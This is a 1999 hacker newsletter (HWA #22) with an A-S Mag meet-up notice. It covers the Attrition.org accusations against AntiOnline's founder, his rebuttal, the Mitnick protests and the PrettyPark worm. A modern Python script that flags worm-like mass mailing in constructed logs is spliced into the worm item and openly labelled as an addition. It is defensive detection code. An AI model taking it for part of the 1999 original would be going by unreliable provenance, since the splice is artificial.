Subject: [a-s_mag] Important : A-S Meet-up date.
Content-Type: text/plain; charset=ISO-8859-1

Hi,

There has been a change to the date of the A-S meet-up, as you probably read in A-S14 we said the date would be the 24th of July. This has had to be changed as it's been discovered that it's not actually going to clash with Compulsion as we planned. The new date is: 31st of July.

I'll be re-uploading A-S14 correcting this in the magazine to soften the blow of readers who have the wrong date. Those who contacted us via email will all be contacted with the new details and posts will go out on the news groups and in as many other magazines that we know have readers who planned to attend as we can possibly get to.

Sorry if this date change causes you problems, on the bright side however I can confirm that after the first A-S Meet-up we plan to hold one every month thereafter on the last Saturday of each month.

In A-S15 we'll publish literally ALL the details we can find that you might need to know for the meet-up, including a selection of venues for accommodation and all their contact details.

Cheers

-Armageddon
Editor of A-S Mag / HNC.
http://www.antisocial.cjb.net
http://www.hack-net.com

------------------------------------------------------------------------

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /* Well several problems kept me from producing the newsletter for the last couple of
     * weeks so this is a 'make-up' release covering June 6th-26th 1999. Some areas may
     * have been glossed over in order to keep the issue down in size, we'll be back to
     * "normal" (whatever that is) next week... meanwhile have fun.
     *
     * Issue #22 June 6th-26th
     *
     * BTW The reason ZDNet articles are not reprinted here is because they are using some
     * funky method to defeat cutting and pasting of their text using framesets and shit if
     * anyone knows a way to grab the text (source doesn't work either for some sites) let
     * me know and i'll be most thankful... Cruci.
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address:

hwa@press.usmc.net

complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.
@HWA

03.0 AntiOnline Crosses the Line
~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 7th 1999

From HNN http://www.hackernews.com/
contributed by whoever

After garnering intense media coverage (CNN, C|NET, WIRED, etc.) over his extremely early reporting of the MOD and gH attacks, John Vranesevich of AntiOnline has used that spotlight to further his own agenda. Now he has admitted to nurturing a hatred of hacking and the underground as a whole and at the same time aiding and abetting criminal acts, "Many times, I knew about these instances before hand, and could have stopped them."

AntiOnline Statement

A Change In Our Mission
An AntiOnline Editorial
Friday, June 04 1999

In the past, a hacker was an individual who literally had to spend years to learn the inner workings of computer technology, programming, and hardware. Only then could he begin to explore possible vulnerabilities, and develop, for himself, ways to exploit those vulnerabilities, and more importantly, ways to patch them. Throughout these years of learning, the hacker would develop a certain respect for the technology that he was studying, and a certain level of maturity would inherently develop as well. Now, in present day society, with point and click utilities abound, a younger, less mature, less knowledgeable, and less respectful, generation of "hackers" have come to life.

That's a quote from an editorial that I wrote in September of last year. Now, only 7 months later, we've seen things get even worse.

When I started AntiOnline 5 years ago, it was a way for me to share with others the fascinating things that I myself was learning. The wonders of technology, how it could be used as a tool, how it could be used as an incredible way to learn, meet new people, and indeed, make the world a smaller and more understanding place. Since then, AntiOnline has grown to levels I never dreamed possible. I'm fortunate enough to be working full time on the site, I have my own office, equipment, and T1 line. The resources I have at my disposal are still small and modest, but I've come a long way from where I was a year ago, running AntiOnline out of my parents' living room.

Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers, and yes, people who have even attempted to sell data to individuals that presented themselves as being foreign terrorists. I've seen people change the medical records of individuals in our armed services, and delete the work of tens of thousands of people that resided on large ISPs. Many times, I knew about these instances beforehand, and could have stopped them. I felt at the time, that I was serving a larger good by simply writing up information that I knew about these instances, and posting them on AntiOnline for the world to read about. I felt that the incidents would be learning experiences, and that they would help technology to evolve, even if it was only in some small way. To me, the important thing was not telling the world the "who", but the "why" and the "how". I tried to stand in an invisible realm between the hacker culture, and mainstream society. A realm which I now see does not exist.

Looking back, I see those years as being not beneficial to anyone but myself. Those years acted as an educational experience for me. A time for me to learn about the "mechanics of the gun", but more importantly, a time for me to learn about the "people that pull the trigger".

In the past 7 months, I have seen things go from bad to worse. Incidents are becoming more frequent and more serious. To some degree, things are in a state of anarchy. I now feel that I am in a position to help serve, even if in some very small way, the better good.

A little note to the Federal and Military Authorities that read this site:

I feel that I have been lax in my duties as a citizen to some degree. But, little known to the rest of the world, I have been working behind the scenes to change that. For the past few months, we've been working with an Air Force contractor to help them develop the "profile of a hacker". AntiOnline, as an organization, plans on taking that to an even higher level as the months progress. Several of you have already signed up for access to our knowledge base, including individuals from: The US Congress, The DISA, The Air Force, The Navy, and several police and computer forensics organizations. You will be given access information within the next week.

A note to these organizations as a whole. I know that often times my exact position and role has been confusing. Let it be confusing no more. I hope that over the next few months, the level of trust between my organization and yours can continue to grow, and I hope that AntiOnline becomes a valuable tool in the fight against "CyberCrime".

Now, a little note to the thousands of hackers that read this site:

You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your own opinions. You yell and scream about privacy, yet you install trojans into others' systems, and read their personal e-mail and files. You truly are hypocrites. All of these grand manifestos that you develop are little more than excuses that you make up to justify your actions to yourself. Actions which you know are wrong. Actions which do not serve anyone's interests but your own.

Let me just say, that you've had free rein over things this past year or so. I know that some of you are playing what you feel is a game. A game that you think you are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet are careful not to provide enough information to actually have it proven.

I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

As a side note, AntiOnline will be taking no press inquiries into this matter. Questions regarding this change in policy will not be answered by phone. Send all questions or comments to jp@antionline.com

-=-

A special report has now been released that details the close ties that John Vranesevich of AntiOnline has with the evil doers of the underground. This report claims that John Vranesevich actually paid individuals who later broke into web sites and then gave him 'exclusive' reports. This report is highly suggested reading for any journalist or reporter who has ever questioned Mr. Vranesevich about anything. It is also suggested that 'customers' of the AntiOnline Knowledge Base read this report and be familiar as to the type of person that is supplying this information. And finally any law enforcement officer who is investigating the whitehouse.gov or any other MOD cracks should absolutely read this report.

AntiOnline Crosses the Line
http://www.attrition.org/negation/special/
(Go here for full links and info)

AntiOnline crosses the Line
6.7.99

INTRO:

John Vranesevich is the founder of AntiOnline [www.antionline.com]. During the past five years, AO has grown from a five megabyte hobby web site, into a multi domain business venture with hundreds of thousands of dollars in venture capital. AntiOnline now claims to be the number one security resource on Internet. Despite this growth and development, AntiOnline has been under continual fire from critics and friends alike. Serious questions have been raised to the methods of reporting, staff background, journalistic integrity and business practice.
Since AntiOnline has become a commercial entity (02-22-99), the site has released 67 pieces (some news articles, some 'specials'). Of these, 12 have been found to contain serious errata. So of the 'reporting' that AntiOnline has conducted, close to 20% has been inaccurate. Recently, information has come to light that suggests a far more serious agenda exists at AntiOnline.

In the past, AntiOnline had two incidents that brought them into the spotlight, and put them on a journalistic pedestal so to speak. The first was centered around two teenagers in Cloverdale CA, and one adult in Israel that was known as "Analyzer". AntiOnline got the scoop that these three (and others) were responsible for compromising hundreds of military and government servers. Through repeated interviews and communication, AntiOnline managed to hype up these attacks which led to them being described as "the most organized and systematic attack the Pentagon has seen to date." A short while later, it was discovered that this threat was nothing more than a group of mostly teenagers breaking into low security machines.(1)

The second spotlight shone on AntiOnline after several exclusive stories and interviews with a group calling themselves "The Masters of Downloading". AntiOnline reported that the members of this group were responsible for compromising hundreds of "high security" Department of Defense computer systems, and stealing files they said were "obtained from the classified Defense Information System Network." Interviews between AntiOnline and the cracker said "I think international terrorist groups would be interested in the data we could gain access to.." Media outlets such as ZDNet unknowingly drew comparisons in the two stories. ZDnet said in one article(2) "The alleged hack - which follows a highly publicized attack on Pentagon computers by an Israeli hacker known as the "Analyzer" and his associates -- would be a major escalation of "informational warfare" on government computers."

From all appearances, AntiOnline was single handedly responsible for a significant amount of the media sensationalism. Not only had AntiOnline driven the media hype behind the stories, they put various government and DOD organizations on full alert preparing for the fallout these attacks would cause.

New information coming to light suggests that AntiOnline had a more integral part in the generation of their news. That the typical journalist/contact relationship did not exist, and in fact, AntiOnline may have been responsible for creating some of the news to report on. With these recent allegations coming to light, the ATTRITION staff and several associates set out to find out the details and foundations of the assertions.

OUR GOAL:

To prove Masters of Downloading (MOD, headed by a hacker named so1o) was paid by John Vranesevich/AntiOnline to hack www.senate.gov or another high profile site in order for AntiOnline to break major news. To further establish that AntiOnline employs active and potentially malicious hackers.

REQUIREMENT:

To prove this, we must first prove several points.

allegation                          evidence
----------                          --------
so1o is on Antionline payroll       proof.1 (Email)
so1o == Chris McNab                 proof.2 (Email)
so1o is an MOD member               proof.3 (Comparison of MOD/CZ hacks)
                                    proof.5 (IRC chat with so1o)
AO reported on it first             proof.4 (AntiOnline reports)

ADDITIONAL:

On June 3rd, 1999, John Vranesevich released an editorial titled "State of the Union". This piece calls into question the true relationship between Mr. Vranesevich and Chris McNab (a.k.a. so1o). The relevant text and concern it raises, coupled with the time of this editorial and subsequent information presents a more damning argument.

On June 4th, 1999, John Vranesevich released a more dramatic and disturbing editorial titled A Change in Our Mission. To most of his readers, this was no doubt surprising, but expected. For a smaller group of us, the timing of this article suggests much more.

On the afternoon of June 3rd, an individual questioned Mr. Vranesevich about his ties to so1o. When challenged, Vranesevich begins to deny his involvement with McNab. This denial comes after mail explicitly stating he WAS funding McNab, and after working with McNab on an AntiOnline "exclusive" on the MOD hacks. The following log and comments illustrate the denial and further backs our goal.

CONCLUSION:

One would hope that high ethical standards are above the law and are in effect with ANY media outlet. It seems that isn't true. Not only has AntiOnline descended into the realm of unethical journalism and business practice, they have done it while thumbing their nose at the Internet. As if they can commit these practices with impunity, John Vranesevich taunts "Well, it would take a lot more than an act of congress to get AntiOnline shut down =) I could always ship the site off to England ;-) That's another good thing about the Internet. The laws of one land don't hold true in them all ;-)". This was written as a reply to one comment in the AntiOnline mailbag on 7-13-98.

As if this is not bad enough, Vranesevich has recently gone on to admit to some of his deeds. In a "change of mission statement" released on 6.4.99, he goes on to say "Many times, I knew about these instances before hand, and could have stopped them."

The information presented above is more than adequate proof that John Vranesevich is funding an active hacker to break into high profile sites. The motivation for this is to increase the awareness and therefore the profitability of his web site AntiOnline. He pays people to break into sites in order to report on it as an 'exclusive'.

Folks.. 1 + 1 still = 2.

Direct comments or questions to: staff (staff@attrition.org)

* Any instance of [snip...] is strictly removing unrelated material. Anything relevant to our argument or anything that would affect our allegations were left. What we do is no different than what JP does to his 'mailbag'.
  Except we leave in material that would possibly weaken our argument. His mailbag gets clipped to include only the material he wants to deal with.

* Permission from Bronc and Ken was given to include the email here.

@HWA

03.1 More Questions Raised about John Vranesevich and AntiOnline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 7th

from HNN http://www.hackernews.com
contributed by Bronc Buster

The rhetoric continues. Did he or didn't he? John Vranesevich has posted a rebuttal to the original attrition.org report that claimed he funded crack attempts. The rebuttal is more of a personal attack than a response to the allegations. Wired Online and Telepolis have written articles that try to shed some light on the situation. Bronc Buster has written an open letter to John Vranesevich that asks some very pointed questions. Questions that I think everyone would like an answer to.

Attrition Report on John Vranesevich
http://www.attrition.org/negation/special/

John Vranesevich Rebuttal
http://www.antionline.com/cgi-bin/News?type=antionline&date=06-07-1999&story=brian.news

Wired Online
http://www.wired.com/news/news/culture/story/20062.html

Telepolis - German
http://www.heise.de/tp/deutsch/inhalt/te/2921/1.html

Open letter from Bronc Buster
http://www.hackernews.com/orig/broncjplet.html

The Wired article and JP and Bronc's letters follow:

Wired;

Hacker Pundits Squabble
by Polly Sprenger
12:15 p.m. 7.Jun.99.PDT

A Web site addressing computer hacking issues has accused a computer security pundit of paying individuals to break into Web servers in exchange for exclusive coverage of the stories that result.

John P. Vranesevich, editor of computer security magazine and resource center AntiOnline, denies the charges.

Vranesevich is well known in the hacking and cracking community. He is often called on by news media, including Wired News, to provide perspective on Web site break-ins, viruses, and other security issues.

A report by the group Attrition.org, released Monday, accuses Vranesevich of paying hackers to break into sites, thus guaranteeing him an exclusive on the stories.

"We've never paid for a story," Vranesevich said. "We don't even pay our reporters for stories. [The allegations] are flat-out libelous and there's no proof to it. It's an attempt to destroy, defame, and discredit me."

Vranesevich's detractors were already inflamed over his recent apparent shift in allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated he was working with the Air Force and other government agencies to help track down crackers.

"A little note to the thousands of hackers that read this site," Vranesevich warned, "I have been watching you these past five years. I know how you do the things you do, why you do the things you do, and I know who you are."

His warnings have stirred the ire of attrition.org, led by Brian Martin (who goes by the name Jericho). Martin said he has been following Vranesevich's case for more than a year.

Martin based his claims on two emails that allegedly show Vranesevich had a business relationship with "So1o," the hacker accused of breaking into senate.gov last year. Vranesevich said the emails displayed on Martin's site "never existed."

Another chronicler of the computer security underground said that Vranesevich's reputation is less than pristine.

"He has made a lot of enemies over the years," said Space Rogue, editor of the Hacker News Network. "This particular accusation has been unproven for a while. It's been thought that this has been going on for some time, that he was paying people or was in league with them."

Space Rogue cited one particular revelation in Vranesevich's Friday statement. "Many times, I knew about these instances [site hacks] beforehand, and could have stopped them," Vranesevich wrote.

"That basically for me solidifies everything in the attrition report," Space Rogue said.

Vranesevich said that he has never been popular with the underground hacker culture because of what he's done to expose it.

"I often say that they hack a site first and make up a manifesto second," Vranesevich said.

He points to his press citations in recent weeks, which include mentions in The New York Times, ABC News, and CNN. He also said that government agencies such as NASA rely on him to provide data on hacker profiles.

But while Martin accuses Vranesevich of using his fame as a platform to prosperity, Vranesevich says he doesn't charge those agencies for access to data and will probably keep the information free of charge forever.

"I think my track record speaks for itself," Vranesevich said. "I'm proud of how I've accomplished and what I've accomplished."

JP's rebuttal

AntiOnline Responds To Allegations
Monday, June 7, 1999 at 11:51:56
by John Vranesevich - Founder of AntiOnline

First off, for those of you that haven't read it, Brian Martin's Attrition website has today posted allegations that AntiOnline funded the Whitehouse.gov and Senate.gov hack so that we would have news to cover (However, I'm sure most of you have read it by now, because of organizations, and I use the term loosely, like the Hacker News Network).

Needless to say, when I went forward with the statement that AntiOnline was going to help in the fight against malicious hackers, I expected some backlash from the hacker community. A few dozen extra hack attempts a day, some synfloods. Maybe I'd find myself with a $10,000 phone bill. But, they've apparently chosen something far more creative.

First off, let me say this. Brian Martin (aka Cult_Hero) was raided by the FBI in connection with being a suspected member of the HFG (The group that hacked the New York Times), and Erik Ginorio (BroncBuster) is known, and admits, to breaking into dozens of sites (he calls himself a hacktivist).
The fact that these two could think, or at least think up, some grandiose scheme which involved AntiOnline bankrolling hackers, is not surprising. They have both lived their lives trying to break, and evade, the law.

For some reason, Brian Martin has become obsessed over AntiOnline. His website has dozens and dozens of pages of what he calls "errata" that he's written about it. He takes information posted on our site out of context, then criticizes us because of it. Many people have written in asking why we never posted any response to all of the allegations he has on his site about us. Personally, it's because I felt that I didn't need to justify myself, or my actions, to someone who is currently under FBI investigation, and who has never done anything for the security scene other than criticize others. I actually feel bad for him. The fact that he spends such a large portion of his life trying to "bring down" others using lies, deceit, and twistings of the truth, is sad in my eyes.

As for these allegations that I paid people to break into government sites so that I could write a story. Let me just say, that such claims are so far fetched and preposterous, I'm not even going to respond to them on a point by point basis.

It seems that almost all of the criticisms that I receive from people like Brian Martin revolve around money. He says in his "allegations" about AntiOnline that "During the past five years, AO has grown from a five megabyte hobby web site, into a multi domain business venture with hundreds of thousands of dollars in venture capital." Is that what he's so upset about? That I've made a ton of money? Well, let me put his mind at ease. The point in fact, is that I don't now, nor have I ever in my life, had a lot of money. Our venture funding wasn't in the amount of hundreds of thousands of dollars. I am not ashamed to say, and in fact, I'm very proud to say, that our original funding was in the amount of $75,000. I am very proud of the levels I have taken AntiOnline to with very little resources, and a lot of hard work. On average, I put in 17 hour days working on the site and related matters. At the age of 20, I'm trying to build a life long career for myself. So, to people like Mr. Martin, let me just say that anything my site has accomplished has not, and truly couldn't have been, from me throwing money at it. It came from my love for what I do, and my willingness to put in the time it takes to accomplish my dream.

In a way, I take these allegations that have come against me as a sign that I'm on the right track with what I'm doing. If people like Brian Martin weren't yelling and screaming about me, I guess I'd take that as a sign that I'm off the beaten path. If people like Brian Martin didn't see me as a threat to them, they wouldn't be yelling. So, I'm going to view these recent allegations as a job well done letter from the malicious hackers of the world.

I have always lived my life in a way which I was proud of, and I will continue to do so. I will NOT allow people like Brian Martin and Erik Ginorio to cause me to constantly be taking some sort of sick defensive on my site (Which is probably what their intentions are). That's not its purpose. So, if they come out with some new allegation, like I have secret plans to assassinate the president with a herf gun or something, you won't find a response to them from me here. As a matter of fact, you won't find a response from me at all. I will let the work that I put forth, and the actions that I take in my daily life, be my response.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

Bronc's open letter;

An open letter to John Vranesevich (aka JP)

07 Jun 1999
from: Bronc Buster bronc@2600.com
subject: in regards to the allegations at http://www.attrition.org/negation/special

John Vranesevich (aka JP),

The staff of Attrition.org, a few other individuals, and I have been working over the last few weeks to piece together a complex web of clues. These clues were leading us to something we have suspected for a while; something that could tarnish the entire hacker community. What if someone, a reporter, was funding a known criminal to commit crimes so that they might have an inside scoop on the story? Not only would this be unethical, but illegal, and dangerous for us all.

Several people have been asking how Antionline.com (AO) has had such an inside scoop on breaking stories, before anyone else regarding big hacks that you have reported on. We have begun to make a theory, based upon facts as to how we think this is happening. Here are a few simple YES or NO questions regarding these allegations and their impact..

1) Because you had reported, in the past, the exclusive reports and interviews on how Masters of Downloading (MoD) had hacked(?) DISA and were alleged to have taken software off their server, it is obvious you knew who the person was who had committed this crime. His handle is so1o (aka Chris McNab). You have admitted to this openly. Knowing this, you then started funding a company run by Chris McNab to make some sort of security program. This you have also openly admitted to. Now Chris McNab, by your own admittance, committed the crime of breaking into several Government servers and ultimately defacing www.senate.gov.
If you were funding this person, and you knew he was a criminal, not only who has comitted crimes in the past you knew about, but had crimes, such as the senate.gov hack, planned out that you knew about before hand, and he then gave you an exclusive on the story because he was getting money from you (regardless if he still is), doesn't this, in your mind, equal a totaly unethical, not to mention illegal, way to get a story? 2) On your site, you openly admit to prior knowledge of crimes that were comitted that you may or may not have reported on. This is illegal. Do you think this fact, combined with the fact that you, in some fashion, were supplying a known criminal (Chris McNab) with money is an ethical way to run your site/business? 3) In your response to the revealed allegations againt you, you posted on your site, there was no link provided (to attrition.org) so that anyone interested, who may see this on your site but not know about the allegations, to see both sides of the story and come to their own conclusions. Attirtion.org posted many links to your site, so that people could see both sides. Sense you posted a response, don't you think it isn't fair to your readers, to at least let them judge for themselves this matter? 4) Do you think that by making personal attacks against the people behind these allegations, and against the sites that are covering it, that the serious issues raised have been answered or at least addressed? 5) Do you in any way feel obligated to provide any answers to: a) The people making these allegations? b) Your readers and supporters? c) The hacking/security community in general? 6) Last but not least. Do you think anything positive can be gained by the hacking community by your actions in these matters? I personally think that your response to the criminal charges against you was childish and immature at best, and this matter warrents a serious reply. Slinging mud, and voicing your opinion about people is no way to counter facts. 
These are felonies, and invlove not only local, but federal laws. This is a serious matter, and like so many of the poor kids you cover who get busted, it appears you will not take it seriously until you too have been arrested and charged. Bronc Buster bronc@2600.com June 9th , a statement from OSAII Admissions Mike Hudack Editor-in-Chief The same day that a Wired News article about the Attrition special report accusing AntiOnline of unethical and even criminal practices came out, I spoke with John Vranesevich on the phone. The Wired News article quoted Vrasenevich (JP) specifically denying the existance of two e-mails which were used as evidence in the Attrition article. JP said the e-mails "never existed," according to Polly Strenger, author of the Wired News article. In my discussion with JP, however, he said "I was quoted out of context in those e-mails." I queried him further, asking him whether those e-mails really existed. He said "the e-mails existed but I was quoted totally out of context -- what I said was in jest." In a conversation hours later, however, he quickly backtracked, saying the e-mails were "manufactured, possibly from several e-mails." He said they were his words in the sense that "words taken from two pages in a book and made to look like a paragraph are the authors words. They´re still manufactured." This obvious contradiction between what I was being told the first time and what he had told Wired News wasn´t the end of it however. He went on to warn me not to "write articles against individuals or other sites. It doesn´t help your relationship with the mainstream -- I learned that the hard way." This statement was obviously a warning not to say anything about our conversation. He went on in his contradictions, however. In the Wired News article, JP is quoted as saying that the allegations against him are "flat-out libelous." In the telephone conversation, however, JP admitted that "the allegations weren´t really libelous. 
If anything they were borderline." He did say, however, that it was up to his "lawyer as to whether to pursue legal action." The clear dicotomy between his earlier statements to Wired News and his statements to me wasn´t the most fascinating issue, however. What was much more fascinating, as Polly Strenger said was "why didn´t he just say he was quoted out of context? That would have made a lot more sense." Later, in an open letter to JP, Bronc Buster called JP´s response to the allegations "childish" for attacking the individuals raising the allegations and not the allegations themselves. In his reponse, JP not once mentions that he was quoted out of context. Rather, he accuses Jericho and Modify (two authors of the allegations) of being subjects of an FBI investigation. He not once addresses the allegations being levelled against AntiOnline and himself. OSAll carefully weighed whether to come forward with JP´s statements, and has decided that it has an ethical obligation to do so. Any questions about this coverage, its fairness or OSAll´s relationship with either Attrition.org or AntiOnline.com should be directed to the editor, who can be contacted at editor@aviary-mag.com or by phone at 203-335-7100. @HWA 04.0 The Difficulties of Reporting the Underground ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 7th 1999 From HNN http://www.hackernews.com/ contributed by Space Rogue In light of all the media attention that hackers have gotten over the last few weeks it is apparent that most reporters and journalists are having a difficult time in accurately reporting the computer underground. While no one is claiming that it is easy, HNN editor Space Rogue takes a look at some of the more common pitfalls in this new Buffer Overflow article. 
     Buffer Overflow
     http://www.hackernews.com/orig/buffero.html

05.0 Mitnick Demonstrations Deemed a Huge Success
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 7th 1999
     From HNN http://www.hackernews.com/

     contributed by Freaky, phar, and Silicon Monk

     Last Friday at 2pm in front of federal courthouses in over 16 cities, people who could no longer sit still while excessive punishment was dealt by an overreaching government gathered together to protest the large number of injustices perpetrated during the trial of Kevin Mitnick. At the demonstration in Philadelphia a large paper mache Liberty Bell was displayed. Reba Mitnick, Kevin's grandmother, was present at her local demonstration. In New York a skywriter wrote FREE KEVIN over Central Park and in San Francisco low flying airplanes carried FREE KEVIN banners.

     FREE KEVIN
     http://www.freekevin.com

     Mitnick Demonstrations - Pictures Here
     http://www.2600.net/demo/

     CNN
     http://cnn.com/TECH/computing/9906/04/BC-INTERNET-HACKERS.reut/index.html

     Wired
     http://www.wired.com/news/news/politics/story/20053.html

     ZD Net
     http://www.zdnet.com/zdnn/stories/news/0,4586,2270517,00.html

     Salon
     http://www.salon.com/tech/log/1999/06/04/mitnick/index.html

Wired;

Pro-Mitnick Demos in US, Russia
by Polly Sprenger
3:00 a.m. 5.Jun.99.PDT

In 15 American cities and Moscow, demonstrators staged protests Friday against the continued imprisonment of Kevin Mitnick, jailed after pleading guilty to seven counts of wire and computer fraud.

"Just don't call him a 'celebrity cracker,'" growled Macki, the Webmaster for 2600, the hacker group and magazine that organized the events.

Armed with yellow "Free Kevin" stickers and flyers describing Mitnick's case, Macki and nearly 20 other Mitnick supporters battled the miserable San Francisco wind to fight for the cause.

"We're getting the word out to the worldwide and national consciousness about [Mitnick's] sentencing," said Marc Powell, a pink-haired member of the local hacker collective New Hack City.

Clad in an "I [Heart] Feds" T-shirt, Powell said that although his own cyber-tomfoolery has been strictly within the law, he sympathized with Mitnick's imprisonment.

As far as protests go, Mitnick's demonstration was relatively low-key. The attendees cheered as a low-flying airplane went by trailing a banner that said "Free Kevin Mitnick -- www.freekevin.com," but after seven or eight more passes, the enthusiasm waned.

Some in the group had followed Mitnick's plight from the beginning, but others were just there to be part of an anti-government staging. Robin, a self-proclaimed anarchist and network administrator with a partially shaved head and a plethora of piercings, said he was in attendance because it was a strike back at the government.

But others, like Perry McNulty, said Mitnick was a study in civil rights.

"It's not just a hacker in jail," said McNulty, who has followed Mitnick's case for about a year. "A lot of civil rights have been violated. It could happen to any one of us."

Salon

Kevin Mitnick supporters plan rallies
- - - - - - - - - - - -
BY KAITLIN QUISTGAARD
June 4, 1999

Since his 1995 arrest for wire and computer fraud, famed hacker Kevin Mitnick has been behind bars. In March a judge sentenced him to a 46-month prison term after he pleaded guilty to a handful of the 25 charges filed against him. But on Friday, demonstrators in 15 U.S. cities and Moscow plan to protest what they see as the unjust treatment of Mitnick and ask for his parole to a halfway house.

"The guy's been in there for something like four years and four months," says Emmanuel Goldstein, editor of "2600: the Hacker Quarterly." (Actually, 2600's Kevin Mitnick Lockdown Clock put it at exactly 4 years, 3 months, 16 days, 11 hours, 19 minutes and 41 seconds at that moment, but who's counting?) It's a heavy sentence for just looking at other people's software, says Goldstein: "The federal government is using him to send a message."

"Even if Kevin were guilty of everything he was charged with," the 2600 site says, "the fact remains that there was no documented damage, no evidence of malicious activity, and nothing to suggest that Mitnick profited in any way by reading the software he is accused of accessing."

The journal says it has uncovered letters showing that companies like Sun Microsystems and Nokia have claimed a combined total of $300 million in damages resulting from Mitnick's hacks. "This is a case of corporate vengeance, aided and abetted by a federal government seeking to intimidate hackers," the 2600 site argues. "We think Kevin Mitnick's suffering has gone on way too long."

2600 is encouraging demonstrators to meet at federal courthouses across the country and the U.S. Embassy in Moscow. The protest will coincide with the monthly 2600 meeting, which brings hackers together in various cities on the first Friday of the month. ("That way the people who spy on us have to spread themselves thin," says Goldstein, explaining the same-time, multiple-locations approach.)

On June 14 a judge will formally sentence Mitnick and determine the damages he owes. The hacker group hopes to influence the court to go lightly on Mitnick. "The judge has the opportunity to sentence him to a halfway house," says Goldstein, "which is a whole lot better than a prison with murderers and rapists."

salon.com | June 4, 1999
- - - - - - - - - - - -
About the writer
Kaitlin Quistgaard is an associate editor for Salon Technology.

@HWA

06.0 New Trojan/Virus, PrettyPark
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 7th 1999
     From HNN http://www.hackernews.com/

     contributed by nvirB

     A new virus/trojan, PrettyPark, arrives as an email attachment and then resends itself to users listed in the Windows address book; it may possibly repeat this as often as every 30 seconds. It also attempts to log into IRC channels to deposit information. Opinions vary as to the threat level of this new virus. At last report it had only been seen in France.
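The behaviour HNN describes above (the same executable re-sent to the whole address book every 30 seconds) leaves a distinctive trace in outbound mail logs. The following added example, not from the HWA issue or from HNN, flags senders whose outgoing mail shows that pattern; the log line format, the sample lines and the thresholds are all constructed for this example.

```python
"""Added example (not code from the HWA issue or HNN): flag senders that
re-send the same executable attachment at a short, regular interval.

The log format below is constructed for this example:
    <ISO timestamp> from=<addr> to=<addr> attach=<filename>
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample mail-gateway log.  carol's host repeats the same
# .EXE to every address it knows every 30 seconds; alice is normal.
SAMPLE_LOG = """\
1999-06-07T09:00:00 from=alice@example.org to=bob@example.org attach=report.doc
1999-06-07T09:00:30 from=carol@example.org to=dave@example.org attach=PrettyPark.EXE
1999-06-07T09:00:30 from=carol@example.org to=erin@example.org attach=PrettyPark.EXE
1999-06-07T09:01:00 from=carol@example.org to=dave@example.org attach=PrettyPark.EXE
1999-06-07T09:01:00 from=carol@example.org to=erin@example.org attach=PrettyPark.EXE
1999-06-07T09:01:30 from=carol@example.org to=dave@example.org attach=PrettyPark.EXE
1999-06-07T09:01:30 from=carol@example.org to=erin@example.org attach=PrettyPark.EXE
1999-06-07T09:05:00 from=alice@example.org to=frank@example.org attach=setup.exe
"""

# Attachment types worth watching; constructed list for this example.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif")


def parse_line(line: str) -> dict:
    """Turn one constructed log line into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    rec = dict(field.split("=", 1) for field in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def find_mass_mailers(log_text: str, min_sends: int = 4,
                      max_interval: float = 60.0) -> dict:
    """Return {sender: summary} for senders whose outgoing mail repeats
    one executable attachment at least `min_sends` times, with the
    typical gap between send rounds at or below `max_interval` seconds.

    Thresholds are constructed for this example; tune them per site."""
    by_key = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["attach"].lower().endswith(EXECUTABLE_SUFFIXES):
            by_key[(rec["from"], rec["attach"].lower())].append(rec)

    hits = {}
    for (sender, attach), recs in by_key.items():
        if len(recs) < min_sends:
            continue
        # One "round" = one timestamp at which the whole list was mailed.
        rounds = sorted({r["ts"] for r in recs})
        if len(rounds) < 2:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(rounds, rounds[1:])]
        typical_gap = median(gaps)
        if typical_gap <= max_interval:
            hits[sender] = {
                "attachment": attach,
                "sends": len(recs),
                "recipients": len({r["to"] for r in recs}),
                "rounds": len(rounds),
                "interval_seconds": typical_gap,
            }
    return hits


if __name__ == "__main__":
    for sender, info in find_mass_mailers(SAMPLE_LOG).items():
        print(f"{sender}: {info['attachment']} sent {info['sends']} times "
              f"to {info['recipients']} recipients, "
              f"every ~{info['interval_seconds']:.0f}s")
```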
     MSNBC
     http://www.msnbc.com/news/276805.asp

     ZD Net
     http://www.zdnet.com/zdnn/stories/news/0,4586,2270411,00.html

MSNBC

PrettyPark: Part worm, part Trojan
Anti-virus companies unearth worm/Trojan that reportedly e-mails PC’s Windows Address Book every 30 seconds
By Joel Deane and Michael Fitzgerald
ZDNN

June 4 — Anti-virus companies said Friday that W32/PrettyPark, a new e-mail worm program with Trojan horse characteristics, poses a potentially high risk to Internet users on Windows-based systems.

Although assessments of PrettyPark’s capabilities vary, and damage reports are sketchy, anti-virus firms advised Friday that users update their anti-virus programs to guard against the worm/Trojan, which was discovered as early as May 12.

Anti-virus company Panda Software said PrettyPark, which is also known as Pretty Worm, reaches users’ computers as an attached file in an e-mail message, just like the Melissa virus. Once executed, PrettyPark installs itself in the infected system, then sends messages with an attached copy of itself to addresses listed in the Windows Address Book.

